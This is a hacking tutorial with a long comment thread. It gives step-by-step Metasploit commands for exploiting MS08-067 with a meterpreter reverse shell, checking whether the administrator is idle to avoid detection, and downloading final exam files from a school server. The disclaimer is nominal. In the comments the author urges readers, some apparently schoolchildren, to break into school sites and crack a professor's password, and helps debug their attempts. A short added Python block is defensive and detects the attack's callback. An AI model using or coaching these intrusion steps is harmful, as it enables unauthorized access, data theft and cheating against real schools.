Hack Like a Pro: How to Hack Your School's Server to Download Final Exam Answers

Welcome back, my fledgling hackers!

If you're like most aspiring hackers, at one time or another you've probably spent too much time playing Call of Duty and not enough time preparing for your final exams.

So for today, we'll look at how to break into your school's server to download the final exam file with the answers onto your computer. Just think of the benefits to your academic record, your Call of Duty skills, and your popularity when you show up at school with the final exams days ahead of the finals!

This hack uses Metasploit along with its meterpreter, so let's get after those finals and fire up our Metasploit in BackTrack!

WARNING (Disclaimer):

Of course, this is for demonstration/entertainment purposes only. Please do not break into your school's server and steal exams as it's illegal and very likely will get you kicked out of school. This is just an example of the security risks that high schools and colleges pose from using outdated systems with known vulnerabilities.

Step 1: Find That Proper Exploit

Those of you who have experience with Metasploit, or who have followed my previous Metasploit tutorials, know that one of my favorite exploits is the RPC buffer overflow that works so well in Windows XP, Server 2003, and sometimes even in Vista and Server 2008.

In our case here, our school is running a Windows 2003 Server that stores all the department's exams and records. So, let's use the /exploit/windows/smb/ms08_067_netapi. To find it, type:

  • msf > search ms08

Metasploit displays all the exploits with ms08 in it. The one we want is second from the bottom. We can highlight it and cut/paste it into our command:

  • msf > use /exploit/windows/smb/ms08_067_netapi

Step 2: Set the Payload

Now we need to set our payload. In this case, we'll use the meterpreter for Windows or /windows/meterpreter/reverse_tcp.

  • msf > set payload /windows/meterpreter/reverse_tcp

Let's take a look next at the options that we need for this exploit/payload combination by typing:

  • msf > show options

Step 3: Set the Options

Now we can see that we need to set the RHOST and the LHOST.

  • msf > set LHOST 192.168.1.114
  • msf > set RHOST 192.168.1.108

Step 4: Exploit That Server!

Now all we need to do is exploit and get a meterpreter prompt on that school server where we can do our dirty work.

  • msf > exploit

Step 5: Check to See if the Admin Is Using the System

We should now have a meterpreter shell on the school's server. Before we even consider downloading files from that server, we want to make certain that no one is on that system where we might get detected. We can run the idletime command to see whether anyone has used the system recently.

  • meterpreter > idletime

As you can see, the last time someone did something on the system was just over 3 minutes ago. To be safe, let's wait a bit and hope the administrator goes home for the night. The last thing we want is for the administrator to detect our attempt to download those final exams!

Once we're safe and the system has been idle for a while, our next step is to find those exams. Meterpreter uses standard Linux commands like ls, cd, pwd, and others, so let's type lpwd (both pwd and lpwd will work).

Meterpreter responds with the / symbol indicating that we're in the root directory.

Step 6: Find the Final Exams

We can then type ls to get a listing of all the directories and files in the root directory. We can see a directory named ConcordUniversity. That's probably where the exams are! Let's change directories to Concord University:

  • meterpreter > cd c:\\ConcordUniversity

Note that we need to use a double \\ to navigate to this directory. This is necessary and critical.

Now that we're in ConcordUniversity, we can get a directory listing by typing:

  • meterpreter > ls

We can see we have folders for Anthropology, Biology, Chemistry, and Economics. Since we're looking for the Biology final, let's navigate to the Biology directory.

  • meterpreter > cd biology

Voilà! There's the final exam for our biology class.

Step 7: Download the Final

Meterpreter has a built-in download feature, so all we need to do is type:

  • meterpreter > download C:\\biology\exams\FinalExam

We can see that Metasploit has downloaded the FinalExam to our computer! Please note again that we do need to use the double backslash (\\) in denoting the directory of the file we want to download.

When we navigate back to our BackTrack system, we can see that the biology final is in our root directory. Yeah!

Now we are guaranteed a 95% (don't get a 100%, the instructor will be suspicious). If you have any questions, feel free to ask in the comments, or head on over to the Null Byte forum if you have questions on hacking topics unrelated to this article.
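
Seen from the server side, Steps 1 through 4 leave a recognizable pattern in connection logs: a host connects to the server on TCP 445, and moments later the server itself opens a connection back to that same host (the reverse_tcp payload). The block below is an added example, not part of the original article, that correlates those two events; the log format, the watched-server list and the 60-second window are assumptions, and the sample lines are constructed.

```python
from datetime import datetime, timedelta

# Constructed sample log, assumed format: "<ISO time> <src>:<port> -> <dst>:<port>",
# sorted by time. The two lab addresses are the ones used in the article.
SAMPLE_LOG = """\
2024-05-01T21:14:02 192.168.1.50:51522 -> 192.168.1.108:445
2024-05-01T21:20:10 192.168.1.114:40112 -> 192.168.1.108:445
2024-05-01T21:20:12 192.168.1.108:1045 -> 192.168.1.114:4444
2024-05-01T21:25:00 192.168.1.108:1050 -> 192.168.1.10:53
not a log line
2024-05-01T22:40:00 192.168.1.108:1066 -> 192.168.1.50:8080
"""

SERVERS = {"192.168.1.108"}      # hosts to watch (assumption)
WINDOW = timedelta(seconds=60)   # correlation window (assumption)


def parse_line(line):
    """Return (time, src, sport, dst, dport), or None for a malformed line."""
    parts = line.split()
    if len(parts) != 4 or parts[2] != "->":
        return None
    try:
        ts = datetime.fromisoformat(parts[0])
        src, sport = parts[1].rsplit(":", 1)
        dst, dport = parts[3].rsplit(":", 1)
        return ts, src, int(sport), dst, int(dport)
    except ValueError:
        return None


def find_callbacks(log_text, servers=SERVERS, window=WINDOW):
    """Alert when a watched server connects out to a peer that just hit its 445."""
    last_smb = {}   # (server, peer) -> time of the most recent inbound 445
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ts, src, _sport, dst, dport = rec
        if dst in servers and dport == 445:
            last_smb[(dst, src)] = ts
        elif src in servers:
            seen = last_smb.get((src, dst))
            if seen is not None and timedelta(0) <= ts - seen <= window:
                alerts.append({
                    "server": src,
                    "peer": dst,
                    "callback_port": dport,
                    "delay_s": int((ts - seen).total_seconds()),
                })
    return alerts


if __name__ == "__main__":
    for alert in find_callbacks(SAMPLE_LOG):
        print(alert)
```

A file server has little reason to initiate connections to its own clients, so this pairing is worth an alert on any port. Applying the MS08-067 patch and keeping TCP 445 unreachable from untrusted networks removes the exposure itself.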

92 Comments

In the rhost and lhost, should I put my target IP?
If no, then where do I put my target's IP?

Padmes:

The RHOST is remote host, the target. LHOST is the local host, you.

OTW

Does not. Believe it not. Did not have real world (vm not). :-((
plz help me.

I mean, the Internet is the real world.

Holmz:

I'm not sure I understand your question or comment. Would you please re-state it for me in complete sentences? What does "Does not" mean?

OTW

Hello, please, I need your help. Is there any way we can get in contact?

Hi, sorry, when I said "does not" I meant that it is not happening.
I do everything but can't open a session; every one of them is unsuccessful.
I don't know why?!
If I give you an IP, will you check it for me and tell me whether it will work on that or not?
Thanks
:-))

Holmz:

What is the operating system of your target?

OTW

My server uses proxy 8080. I'm trying to find the host IP but I have a lot of IPs; I don't know which is the real host?

Thanks OTW,

By the way, I realised your LHOST is always 192.168.1.something. Does that mean you are always in his network when you hack into his database? What if you are trying to enter from another network, for an exam across countries?

Actually, maybe I just don't understand IP addresses well enough. Hope you can clarify! Thanks OTW and keep posting! Love your article.

In my posts here, I always am demonstrating on computers in my hacking lab. They are all on the same internal network, so they always have those private IP addresses.

If I were to attack a server on the outside, I would use their IP address which would not have a private, but rather a public, routable IP. You will need to first obtain the public IP of the server and use that.

Hope that answers your questions.

OTW

Hey can you tell how to hack after knowing the school ip ?

If you were actually in anonymous you wouldn't be asking how to hack a school computer.

Anonymous:

Welcome to Null Byte! Glad you found us!

Getting the IP address is simple. Just ping the school's domain where they host their website.

ping www.schoolswebsite.com

It will return pings and the IP address.

OTW

When I do this exploit, Metasploit binds to localhost successfully, and sends the exploit, but then nothing happens. It returns msf exploit(exploitname). Does that mean the exploit doesn't work?

Andrew:

It might. When you say it "binds to localhost" successfully, what do you mean? Does it come back and say "binding to localhost"? Are you giving your IP address or "localhost"/127.0.0.1?

OTW

Yes, it does say "binding to localhost". I gave it my IP address, which I verified with ifconfig.

What IP address did you give it?

192.168.10.103

My OS is Kali; the target's is Windows XP.

Hmmm...should work. What ports are open?

The target must have port 445 open.

Ports 135, 139 and others. Stumped me too. Should I try the sessions -i 1 command? Or should meterpreter automatically pop up?

Yes, try sessions -l. Meterpreter doesn't always pop up.

OTW, can you shed any light on the online learning system called BlackBoard? Specifically, unmasking online test answers (radio buttons). It is quite secure, but I've learned that some of the most secure sites leave the most obvious vulnerabilities open for exploration...unfortunately I have yet to find any. Their web server has been masked and they are using a Cisco OS (???)

Gametime:

I've never tried hacking Blackboard, but like any piece of software, it has vulnerabilities.

The Cisco OS you are seeing is either a switch or router. That is not the OS of the server.

I doubt that anyone has spent a lot of effort trying to hack it because there are no rewards for doing so.

OTW

OTW:

When you say "there are no rewards for doing so" I have to respectfully disagree. Rewards are subjective to the one receiving said reward.

To a student, the rewards for unmasking the inner workings of the system used to test his or her "knowledge" (or regurgitation from short-term memory) are limitless.

To others, the reward may not be as "rewarding" as it is for the student, but doesn't the majority of the "reward" of hacking come from the challenge itself?

Gametime:

I agree with you, but remember, I'm talking about the hacking community which is driven by money. There is very little money to be gained by hacking Blackboard, so few are spending their time trying to find its vulnerabilities and develop exploits.

OTW

OTW:

Well, there is a first time for everything so if you ever feel the urge to "explore" just let me know.

-Gametime

Ok, I'll keep that in mind, but my agenda is very full at the moment.

Thanks a lot occupytheweb, I like all your posts, it's amazing.

One more question:

After knowing the school IP, can I hack it from any public library or cafe or any other place, or do I have to be in the local network of the school?

Anonymous;

Thanks for your kind words.

You can hack from anywhere. In my tutorials, I use my hacking lab with internal IPs, but they will work from any IP.

OTW

OTW

How to hack a windows server 2008 SP1-SP2 ?

Hi, great tutorial! Just two quick questions:
1) How do I find out what server my school is running on (you said yours was windows 2003 server)
2) is the "ms 08" command only for the win 2003?

Jojo:

As for the operating system on your school, check out my recon tutorials particularly the one on xprobe2.

The ms08_067 exploit will work on most Windows operating systems up to the original Windows Server 2008. Microsoft has patched this vulnerability, though, on most systems.

Yes, I am using the free, community version of Metasploit.

Hope this helps.

OTW

Oh, one more thing! Your version of Metasploit - is it the free community one everyone can download or the one you have to pay for?

Hey OTW, something mad weird is going on with my school.

So day one I tried this, it all seemed to work and then when it got to the "exploit" command, it started and said something like "connection timed out". I had a gut feeling this was due to the wrong RHOST address. Anyways, you said to find RHOST ping the school site so I did, and it won't return anything even though the site is up. I googled web address to IP to find the IP that way, and that's the IP I used as RHOST. I also tried xprobe2 to scan for the OS running; that wouldn't work either. I then logged onto a school PC (I just realized it was wired, maybe that's why) and did ipconfig in CMD to find the default gateway, tried pinging that, and again nothing in return.

Why can't I xprobe, exploit, or even ping the site? :(
-Jojo

Jojo:

I'm not surprised. First, many network admins disable a ping response on their network for just this reason. Try using hping or nmap. Look for my tutorials here in Null Byte. You can use TCP or UDP to ping with these tools which can't be blocked by the firewall or router and still have connectivity.

Also, you are probably correct regarding why the exploit timed out. You are probably using the wrong IP address. Just one last thing. Make certain you are using the public IP address of the web server.

OTW

OTW,

Do you know if official examinations like GCSEs (in the UK) are all already online for administrators to see?
And then if perhaps the administrators would have access to the answers as well online?
If so, do you think the answers will be made available to anybody online before the examinations are over?
Thank you in advance sir!

Martin.

Nemesis:

I'm sorry I can't really answer that question about your exams. The important point I was trying to make in this article is that you can get whatever is on the server with Metasploit. If the answers are there, I'm sure you can get them.

OTW

Barrack:

If you mean, will this attack work with a Mac as the victim, the answer is "no". Exploits are very specific to the OS, the services, the ports, etc. You could do this with another exploit on a Mac, though.

OTW

My man, a Bells for you, love how elaborate your explanations are. I'm a noob and think I will learn a lot from your posts, enlightening indeed..... (y)

OTW
Teach me the ways of hacking my Teacher
I'm still in 9th grade so bear with me

I want to tap into my school's website. Is there a way?

Ardan:

Welcome to Null Byte!

Just follow my tutorials and I'm sure you will be into your school's website shortly.

OTW

Shubham:

Are you asking me whether you can hack into a game server? Of course!

OTW

Thanks for the info. I used it for other purposes though, so not too illegal.

What is the prospect of doing it using Blackboard?

Wok:

Maybe, but this is a server hack and blackboard is an application.

OTW

Sir OTW, thank you a LOT for your excellent posts, but I still have some questions:
1: Should I set the LHOST to my private IP address?
2: When I try to exploit the webserver, it gives the following error:

* Started reverse handler on 192.168.1.5:4444
* Automatically detecting the target...
* Fingerprint: Windows Server 2008 R2 Enterprise 7601 - Service Pack 1 - lang:Unknown
* We could not detect the language pack, defaulting to English

  • Exploit failed no-target: No matching target

Hi Matt:

Exploits are very specific to the operating system, ports, services, language and applications. This one is for XP and Server 2003. That's why it won't work.

OTW

Thanks a lot for the response.

But is there another exploit (just like this one) for Win7?

with regards

Matt Buller

Matt:

I have several Windows 7 tutorials on here and another coming out today or tomorrow exploiting Adobe Flash Player on Windows 7/8.

OTW

Bro, please share your email ID. I want to ask some questions about your hacking post.

Please ask all your questions here.

Good day would you be able to assist me? I would like to know how to hack a university marks server. A South African university. UWC to be specific. Alternatively would you be able to put me into contact with Cape Town based hackers who don't charge too much for their services?

Hi.
After I put "exploit" in msfconsole, I have this:

  • Exploit failed unreachable: Rex::ConnectionTimeout The connection timed out.

The server is IIS 6.0, 2003, like the one in your example.

Yes, totally.
Test :
(4 packets transmitted, 4 received, 0% packet loss, time 3004ms)

When I ping the site (thesite.com), in the Terminal, I can see: 64 bytes from site.thesite.com (the ip)... When I type this IP and this site in my browser, I'm not authorized (403). But just thesite.com works...

I don't know if you understand.

But I know another IIS 6.0 site that might be exploitable.
But I found that on the 2 sites, sometimes, there is no answer from my pings.

I don't know if that's why I have this error (no ping answers), but how can I solve this bug? Thanks a lot.

Often, the router will drop pings.

The RPORT is 445, but 445 is not enabled on the target.
Can I do something or is it game over?

Tony:

This exploit takes advantage of port 445. If it's not open, you will need to try another exploit.

It's seldom that someone closes port 445. How do you know it isn't open?

OTW

It's just a local exploit...

How do I get my professor's password for the final exam?

Check out my tutorials here on cracking passwords. There are many different ways.

What should i do !!
Pinging site.com xxx.xxx.xxx.xxx with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for xxx.xxx.xxx.xxx:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

The exploit doesn't work, because the host is unreachable. I set my RHOST. What do I do now?

--

Is there a way I can completely "open" some ports, if i have full access to the router/A.P. but not the server's firewall?

--

I'm not sure I understand your question. Do you mean, can you open the ports on the remote server's firewall? If so, the answer is yes, but you will need access to the firewall's admin panel.

It's much easier to avoid the firewall. Every firewall has some ports open (80, 443, 53, etc). There are multiple techniques for sending your traffic through those open ports.

--
Thank you OTW,

Actually I don't have access to the server's firewall, but cracked the A.P. pass (and the default authentication works too) so, I was thinking of opening ports by forwarding them, but no success.

It only has two open ports 80 and 8080 (Apache server), I recently scanned it and now it has another open port i.e. 21 FTP, which is vulnerable, I will try to exploit it today.

Thank You again
--

Everything lost after the step where we have to put LHOST and RHOST
>The type of URL my institution use is 124.124.78.5:8084
>I had set LHOST to my IP ADDRESS from IPCONFIG
>it always says EXPLOIT FAILED , REFUSED BY REMOTE SERVER
>whenever i ping the address it only pings back
>i installed KALI LINUX on PARALLEL DESKTOP 10 on MAC
....> And launched METASPLOIT FRAMEWORKS
Please Help ME Further

Sunny:

Have you done your recon on your target? What is the server's operating system? What ports are open? What applications are running?

OTW

my school is using uniserver, windows 7.
is there a way to hack the server?

OTW, how did you access the RHOST IP? That's the part I cannot figure out how to get :/

Btw, thank you for your awesome tutorials, have been going through a lot of them :).

Hi, I am using the latest version of Kali and when I try to set the payload this notification pops up: The value specified for payload is not valid

is there a way to do this with windows 7

what if the server am trying to exploit is a linux operating system, like ubuntu for example, how do i get the exert exploit to use

Can anyone tell me which exploit I need to exploit an Windows Server 2012 R2?

is this hack used via LAN connect or Wireless connection?

please say that,please

but what if they are using a apache server and not a microsoft 2003 server?

My school website is running on Linux (Apache server)

hi, i can't install the metasploit. i already tried my best to close all the firewall and antivirus program. can somebody help?